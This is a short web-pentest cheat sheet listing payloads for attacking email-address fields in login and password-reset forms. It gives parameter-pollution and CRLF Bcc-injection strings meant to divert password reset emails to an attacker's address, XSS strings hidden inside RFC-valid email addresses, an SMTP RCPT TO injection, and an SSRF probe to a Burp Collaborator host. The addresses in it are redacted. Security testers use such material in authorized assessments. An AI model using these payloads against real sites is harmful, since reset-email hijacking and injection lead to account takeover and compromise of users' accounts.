Email Address Forms
How to exploit login and forgotten password forms.
Email Address Form Payloads
The following payloads can be used when attempting to exploit an email address form
Param Manipulation and CRLF Injection
Use these payloads to try and force the web application to send legitimate password reset emails and such, to a email address you control:
{”email”:”[email protected]”,”[email protected]”}
{”email”:[”[email protected]”,”[email protected]”]}
[email protected]%0D%0ABcc:[email protected]
Other checks (XSS, SSRF, SMTP Manipulation)
Use these payloads (which are all valid email addresses according to the RFC) to find other issues.
<svg/onload=alert('XSS')>@test.com
test@test(<svg/onload=alert('XSS')>).com
"<svg/onload=alert('XSS')>"@test.com
"[email protected]\r\nRCPT TO:<victim+"@test.com>
test@[burpcollab.com]
Last updated